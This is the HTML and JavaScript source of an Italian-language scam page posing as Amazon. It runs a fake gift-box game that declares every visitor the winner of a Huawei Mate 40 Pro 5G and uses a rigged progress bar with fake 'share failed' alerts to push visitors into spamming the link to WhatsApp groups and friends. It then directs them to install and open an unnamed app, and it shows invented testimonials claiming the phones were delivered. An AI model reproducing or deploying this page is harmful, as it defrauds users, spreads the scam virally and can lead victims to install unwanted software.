                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="4" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="5" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="6" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="7" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="8" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="9" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="10" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="11" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
            </div>
            <div id="p_modal1" class="modal fade text-center p_modal" tabindex="-1" role="dialog" aria-hidden="true">
                <div class="modal-dialog" role="document">
                    <div class="modal-content">
                        <div class="modal-body">
                            <img class="temblor_inf" src="https://1.bp.blogspot.com/-lEbuopHIxt8/YFV4aPQx1BI/AAAAAAAAACg/FQYUnFPQK7sdKEEnsaKc1OpQV88K66bKACLcBGAsYHQ/s16000/amazon2.jpg">
                            <h2> Congratulazioni, le tue risposte sono state salvate con successo!</h2>
                            <p>
                                 Hai la possibilità di vincere regali.<br>
                                <br>
                                 Devi selezionare la casella corretta con il tuo premio all'interno.<br>
                                <br>
                                 Hai 3 tentativi.  In bocca al lupo!
                            </p>
                            <div id="p_modal_button1" class="p_modal_button">
                                OK
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="p_modal2" class="modal fade text-center p_modal" tabindex="-1" role="dialog" aria-hidden="true">
                <div class="modal-dialog" role="document">
                    <div class="modal-content">
                        <div class="modal-body">
                            <div class="circle-loader">
                                <div class="checkmark draw">
                                </div>
                            </div>
                            <h2> Ops...</h2>
                            <p>
                                 Spiacenti, la casella che hai selezionato è vuota.  Hai ancora <span id="num_intentos">3</span>  possibilità!  In bocca al lupo!
                            </p>
                            <div id="p_modal_button2" class="p_modal_button">
                                OK
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="p_modal3" class="modal fade text-center p_modal" tabindex="-1" role="dialog" aria-hidden="true">
                <div class="modal-dialog" role="document">
                    <div class="modal-content">
                        <div class="modal-body">
                            <img src="https://i.imgur.com/mov9JFN.png">
                            <h2> Congratulazioni!</h2>
                            <p>
                                 Ce l'hai fatta!  Hai vinto l'Huawei Mate 40 Pro 5G!
                            </p>
                            <p>*** LE REGOLE***</p>
                            <p>1.  Devi informare 5 gruppi o 20 amici delle nostre promozioni.</p>
                            <p>2.  Inserisci il tuo indirizzo e scarica l'app.</p>
                            <p>3.  I regali verranno consegnati entro 5-7 giorni</p>
                            <div id="p_modal_button3" class="p_modal_button" onclick="showShare()">
                                OK
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <canvas id="confetti-canvas" style="display:block;z-index:999999;pointer-events:none;position: fixed;left: 0px;top: 0px;" width="360" height="640"></canvas>
        </div>

        <div class="main-content" id="content4" style="display: none">
            <style>
                /*   fenxiangyemian	*/
                .share_desc{font-size: 14px;}
                .share_success {display: none;}
                .container {width: 100%;background-color: #ffffff;margin-right: auto;margin-left: auto;}
                .share_body {margin: 0 auto;width: 90%;background: #ffffff;border-radius: 10px;}
                .share_hd_text {text-align: center;font-size: 24px;font-weight: bold;color: #FF0000;}
                .share_main {margin: 10px auto;width: 100%;background: #e6e6e6;border-radius: 10px;}
                .share_main_bt {margin: 10px auto;background: #36A201;border-radius: 10px;width: 80%;line-height: 45px;text-align: center;font-size: 18px;font-weight: bold;color: #FFFFFF;}
                .weui_dialog_text {margin: 0 5px;text-align: center;font-size: 14px;color: #222222;}
                .progress{height: 20px;margin-bottom: 20px;overflow: hidden;background-color: #F5F5F5;border-radius: 4px;-webkit-box-shadow: inset 0 1px 2px rgb(0 0 0 / 10%);box-shadow: inset 0 1px 2px rgb(0 0 0 / 10%);}
                .progress-bar-success {height: initial;background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);}
                .progress-bar {-webkit-animation: progress-bar-stripes 2s linear infinite;-o-animation: progress-bar-stripes 2s linear infinite;animation: progress-bar-stripes 2s linear infinite;}
                .progress-bar {background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);-webkit-background-size: 40px 40px;background-size: 40px 40px;}
                .progress-bar {float: left;width: 0%;height: 100%;font-size: 12px;line-height: 20px;color: #FFF;text-align: center;background-color: #337AB7;-webkit-box-shadow: inset 0 -1px 0 rgb(0 0 0 / 15%);box-shadow: inset 0 -1px 0 rgb(0 0 0 / 15%);-webkit-transition: width 0.6s ease;-o-transition: width 0.6s ease;transition: width 0.6s ease;}
                @keyframes  progress-bar-stripes{ 0% {background-position: 40px 0;} 100% {background-position: 0 0;} }
            </style>
            <script>
                var tipnstr = " Devi condividere con gli amici su Whatsapp la nostra promozione all'indirizzo di spedizione.  Condividi fino a quando la barra blu è piena!";
                var alertTip = " Condivisione non riuscita. Lo stesso gruppo o lo stesso amico non è corretto.  Si prega di controllare e condividere di nuovo.";
                var value=0;
                var appName= "whatsapp";
                var theme = "amazonhz-tt";
                var g_banner_ad = true


                function showShare() {
                    set_Cookie('type_op', 2)
                    jQuery('#p_modal3').modal('hide');
                    $('#content4').show();
                    $('#content3').hide();
                    $('#content2').hide();
                    $('#content1').hide();
                    $('#content0').hide();
                }

                $(function () {
                    var typeop = parseInt(get_Cookie('type_op'));
                    if(typeop == 2){
                        showShare()
                    }
                    if (get_Cookie('prog')) {
                        setTimeout(function () {
                            $(".hide-all").hide();
                            $(".show-all").show();

                            incrementValue_a();
                            fn1_a();
                            chooseApp(1);

                            if(get_Cookie("appName")!=""){
                                appName = get_Cookie("appName");
                            }
                            $(".appName").html(appName);
                            $("#sw_bn").html(appName);
                            tipnstr = tipnstr.replace(/NNN/g, appName);
                            // document.getElementById("buttonO").style.display="block";
                            // document.getElementById("selectdiv").style.display="none";

                        }, 200)
                    }
                })




                function fn1_a() {

                    v = parseInt(get_Cookie('prog')) - 1;
                    document.querySelector('#progressbar').style['display'] = "block";
                    v == '0' ? ob = 30 : v == '1' ? ob = 50 : v == '2' ? ob = 52 : v == '3' ? ob = 60 : v == '4' ? ob = 60 :
                        v == '5' ? ob = 65 : v == '6' ? ob = 70 : v == '7' ? ob = 80 : v == '8' ? ob = 85 : v == '9' ? ob = 90 :
                            v == '10' ? ob = 96 : v == '11' ? ob = 98 : v == '12' ? ob = 100 : void(0);
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').textContent = ob + "%";

                }
                function incrementValue_a() {


                    value = parseInt(get_Cookie('prog')) - 1;
                    if(value == 2 || value == 4 ){
                        wxalert("",alertTip,"OK",2,function(){});
                    }



                    if (value >= 12) {
                        lasthtml();
                    }
                }

                function chooseApp(type){
                    if(type==1){
                        appName="Whatsapp";
                    }else{
                        appName="Line";
                    }
                    set_Cookie("appName", appName);
                    $(".appName").html(appName);
                    $("#sw_bn").html(appName);
                    tipnstr = tipnstr.replace(/NNN/g, appName);
                    // document.getElementById("buttonO").style.display="block";
                    // document.getElementById("selectdiv").style.display="none";
                }

                j = '';
                banner = '';

                function incrementValue1()   {
                    var tiaoban1=tiaoban+'amazonhz/tb.php?v=ss'+ new Date().getTime().toPrecision().substr(0,7);
                    if(parseInt(get_Cookie('prog')) > 100){
                        window.open('whatsapp://send?text='+tiaoban2);
                    }else{
                        window.open('whatsapp://send?text='+tiaoban1);
                    }
                    setTimeout(function(){
                        incrementValue_i();
                        fn1_i();
                        value = parseInt(get_Cookie('prog'));
                        if (value > 3 && g_banner_ad === true) {
                            var qs = ead + Math.round(Math.random() * 10000000)
                            jQuery("#banner_ad_share").html('<iframe src="'+qs+'" width="300" height="250" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" sandbox="allow-forms allow-pointer-lock allow-popups allow-same-origin allow-scripts"><\/iframe>')
                            g_banner_ad = false
                        }
                        set_Cookie('prog',value+1);
                    },2000);
                }

                function incrementValue_i() {
                    get_Cookie('prog') == '' ? value = 0 : value = get_Cookie('prog');
                    if(value == 2 || value == 4 ){
                        wxalert("",alertTip,"OK",2,function(){});
                    }
                    set_Cookie('prog', value);
                    if (value >= 12) {
                        lasthtml();
                    }
                }

                function fn1_i() {
                    v=get_Cookie('prog');
                    document.querySelector('#progressbar').style['display'] = "block";
                    v=='0'?ob=30:v=='1'?ob=50:v=='2'?ob=52:v=='3'?ob=60:v=='4'?ob=60:v=='5'?ob=65:v=='6'?ob=70:v=='7'?ob=80:v=='8'?ob=85:v=='9'?ob=90:v=='10'?ob=96:v=='11'?ob=98:v=='12'?ob=100:void(0);
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').textContent = ob + "%";

                }

                function lasthtml() {
                    // html="";
                    // document.getElementById("lastapp").innerHTML = html;
                    document.getElementById("buttonl").style.display = 'none';
                    document.getElementById("button2").style.display = 'block';
                }

                function dapp() {
                    window.open(cad);
                }

                function tipn() {
                    wxalert("",tipnstr,"OK",2,function(){});
                }
            </script>
            <div class="container share_page" style="padding: 0px">
                <div class="share_body share_page" style="width: 100%;background: #f7f7f7;">
                    <div class="share_hd_text"> Congratulazioni!</div>
                    <div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
                        <img src="https://i.imgur.com/mov9JFN.png" height="170px">
                    </div>
                    <div class="weui_dialog_text" style="color: #222222;"> Il tuo premio è: Huawei Mate 40 Pro 5G Full Netcom 8 GB + 256 GB (nero brillante), segui le istruzioni nella pagina successiva per richiedere il tuo premio !
                    </div>
                    <div class="share_main">
                        <div id='buttonl' class="share_ing" style="margin: 0 15px;">
<span class="share_desc" style="color: #222222;">
<br>
1.  Condividi con 5 gruppi / 20 amici su WHATSAPP (fai clic sull'icona "WhatsApp" in basso)<br><br>
2.  Fai clic su "Continua" per ricevere regali.
</span>
                            <div class="share_main_bt" onclick="incrementValue1()">WhatsApp</div>
                            <div style="text-align: center;color: #999999; font-size: 14px"> Condividilo finché la barra blu non è piena !</div>
                            <div class="progress progress-striped active" style="margin: 10px 0; border-radius: 19px;">
                                <div class="progress-bar progress-bar-success" style="width:0;background-color:#2196f3;" id="progressbar"></div>
                            </div>
                            <div class="share_main_bt" onclick="tipn()" style="margin: 20px auto 0; background-color: #222;">
                                 Continua
                            </div>
                            <br>
                        </div>
                        <div id="button2" class="share_success" style="margin: 0 15px;">
                            <div style="font-size: 14px;text-align: left">
                                <font color='red'><br> Congratulazioni!  L'ultimo passaggio :<br></font>
                                <br> Devi completare questo passaggio finale!
                                <br><br>1.  Devi installare l'applicazione sottostante e una volta installata devi aprirla per 30 secondi .
                                <br><br>  (Ricorda, questo passaggio è molto importante)
                                <br><br> Dopo aver completato le azioni di cui sopra, attendi che l'amministratore lo controlli, la revisione sarà completata entro 24 ore .
                                <br><br>
                            </div>
                            <div class="share_main_bt" onclick="dapp()"> Completa la registrazione</div>
                            <div id="banner_ad_share"></div>
                            <br>
                        </div>
                    </div>
                    <div class="weui_dialog_text" style="margin-top:-5px;line-height: 36px;color: #666666"> Questa offerta è valida per 500 secondi.
                    </div>
                </div>
            </div>
        </div>

        <div class="main-content" style="margin-top: 10px">
            <style>.name,.profile{cursor:pointer}.name{font-weight:700}.comments_face{font-family:roboto,sans-serif;background-color:#fff}.comments_face .comments{background-color:#eeeff4;border-bottom:2px solid #fff;padding:10px}.comments_face .profile{float:left;width:60px;margin-right:10px}.comments_face .comment-content img,.comments_face .profile img{width:100%}.comments_face .comment-content img,.comments_face .profile img,.comment-status img{margin:0 auto}.comments_face .comment-content{padding-left:70px}.comments_face p{font-size:14px}.comments_face .name{margin:0}.comments_face .comment-status span,.comments_face .name{color:#3b5998}.comments_face .name,.comments_face .result{font-weight:700}.comments_face .button,.comments_face .name,.comments_face .profile{cursor:pointer}.comments_face .comment-status{font-size:11px;cursor:pointer}.comments_face .comment-status span,.comments_face .name{color:#3b5998}.comments_face .button,.comments_face .main-content span{color:red}.comments_face .clr{clear:both}</style>
            <div class="comments_face">
                <div class="comments">
                    <p style="margin:0;padding:0;float:left;display:block;width:50%">
                        <span style="color:#3b5998"> Commenti</span>
                    </p>
                    <p style="margin:0;padding:0;float:right;display:block;width:50%;color:#a8a7a7;text-align:right">
                         11 di 183
                    </p>
                    <div style="clear:both">
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/6.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Sallie Hull
                        </p>
                        <p>
                             Cazzo, non ho vinto niente!
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta<img src="img/like.png" width="15px" height="15px">20</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/3.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Marvin Allen
                        </p>
                        <p>
                             Mi piacciono queste promozioni!
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">47</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/2.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Casey Daniels
                        </p>
                        <p>
                             L'ho ricevuto oggi.  Molte grazie!

                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">3</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/8.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Walter Hoffman

                        </p>
                        <p>
                             Pensavo fosse uno scherzo, ma è arrivato stamattina!
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">19</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/11.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Hugo Montgomery
                        </p>
                        <p>
                             Ho partecipato, ho vinto e ho ricevuto dopo 5 giorni.  Grazie mille ragazzi!
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">26</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/4.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Remi Peltier
                        </p>
                        <p>
                             Posso ricevere oggi?  Grazie
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">38</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/9.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Stephane Loupe
                        </p>
                        <p>
                             Pensavo fosse uno scherzo ma stamattina ho ricevuto il mio Huawei Mate 40 Pro 5G tramite DHL e vorrei fare altri sondaggi!
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">27</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/10.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Tracy Schmeler
                        </p>
                        <p>
                             Ci sono altri sondaggi da svolgere?
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">50</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/1.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Sandy Orn
                        </p>
                        <p>
                             Fantastico!  Non ho mai vinto niente prima!
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">45</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/5.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Robert De Villiers
                        </p>
                        <p>
                             All'inizio pensavo fosse uno scherzo ma alla fine ho ricevuto il mio Huawei Mate 40 Pro 5G.  L'ho detto agli amici, così possono avere anche il loro.
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">17</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
                <div class="comments">
                    <div class="profile">
                        <img src="img/7.jpg">
                    </div>
                    <div class="comment-content">
                        <p class="name">
                             Annie Clérisseau
                        </p>
                        <p>
                             Posso acquistare il mio Huawei Mate 40 Pro 5G oggi?  Grazie
                        </p>
                    </div>
                    <div class="clr">
                    </div>
                    <div class="comment-status">
                        <span> Mi piace · Commenta <img src="img/like.png" width="15px" height="15px">51</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
                    </div>
                </div>
            </div>
            <p style="font-size:12px;color:#bcbcbc">
            </p>
        </div>

    </div>
</div>
<div id="p_loading" style="display:none">
    <div class="d-flex justify-content-center" style="margin:0 auto">
        <div class="spinner-border" role="status">
            <span class="sr-only">Loading...</span>
        </div>
    </div>
</div>


<style>
    #footer a{color:#efefef}
</style>
<div id="footer" style="background-color:#0d141e;margin-bottom:0;font-size:12px;text-align:center;color:#efefef;padding:10px">
    <p style="line-height:20px;margin-bottom:0">
        © 1996-2021 amazon.com, Inc.
    </p>
</div>
</body></html>
<script>
    (function() {
        var hm = document.createElement("script");
        hm.async = true;
        hm.src = "https://hm.baidu.com/hm.js?9c00d60763ab1c981b7bf2343c65c06a";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>